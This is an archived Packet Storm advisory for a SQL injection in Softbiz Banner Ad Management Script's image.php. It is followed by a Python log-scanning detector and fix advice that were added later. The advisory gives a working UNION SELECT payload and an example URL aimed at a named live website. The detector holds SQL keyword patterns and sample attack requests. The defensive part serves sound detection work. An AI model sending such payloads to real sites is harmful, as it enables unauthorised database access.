Softbiz Banner Ad Management SQL Injection

2011-04-02T00:00:00
ID PACKETSTORM:100013
Type packetstorm
Reporter Egyptian.H4x0rz
Modified 2011-04-02T00:00:00

Description

                                        
`####################################################################  
[+] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]  
[+] Author : Egyptian.H4x0rz  
[+] Contact : SpY(at)Hotmail.Com  
[+] Date : 02-04-2011  
[+] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php  
[+] category: Web Apps [SQli]  
[+] HomePage : Black-hat.cc  
####################################################################  
Vulnerability:  
  
*SQL injection Vulnerability*  
  
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11  
~  
[#] eXample  
http://www.housemusik.dk/ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11  
  
####################################################################  
  
`
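
Detection example added here (not part of the original advisory and not vendor code): a scan of web access logs for requests to image.php whose size_id is not a plain integer, as in the request pattern shown above. It assumes that legitimate size_id values are non-negative integers and that logs are in common/combined format; the keyword list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of a common/combined access-log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Illustrative keywords that mark a malformed value as a likely injection attempt.
SQL_KEYWORDS_RE = re.compile(r"\b(union|select|sleep|benchmark|information_schema)\b", re.I)

def classify_size_id(value):
    """Return 'ok', 'malformed' or 'sqli' for one decoded size_id value."""
    # Assumption: a legitimate size_id is a short non-negative integer.
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    return "sqli" if SQL_KEYWORDS_RE.search(value) else "malformed"

def scan(lines, script="image.php", param="size_id"):
    """Yield (line_no, verdict, decoded_value) for suspicious requests."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/" + script):
            continue
        # parse_qs percent-decodes and maps '+' to a space, so both
        # encodings of the same payload normalise to one string.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_size_id(value)
            if verdict != "ok":
                yield no, verdict, value

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Apr/2011:10:00:01 +0000] "GET /ad-manager/image.php?size_id=3 HTTP/1.1" 200 512',
    '192.0.2.77 - - [02/Apr/2011:10:00:05 +0000] "GET /ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11 HTTP/1.1" 200 498',
    '192.0.2.77 - - [02/Apr/2011:10:00:09 +0000] "GET /ad-manager/image.php?size_id=-1%20UNION%20SELECT%201 HTTP/1.1" 200 498',
    "192.0.2.12 - - [02/Apr/2011:10:00:11 +0000] \"GET /ad-manager/image.php?size_id=3' HTTP/1.1\" 200 0",
    '192.0.2.12 - - [02/Apr/2011:10:00:12 +0000] "GET /ad-manager/index.php?size_id=abc HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for no, verdict, value in scan(SAMPLE_LOG):
        print(f"line {no}: {verdict}: {value!r}")
```

The same integer-only rule is the server-side fix: casting or validating size_id as an integer before it reaches the query, or binding it as a parameter, rejects every value this scan flags.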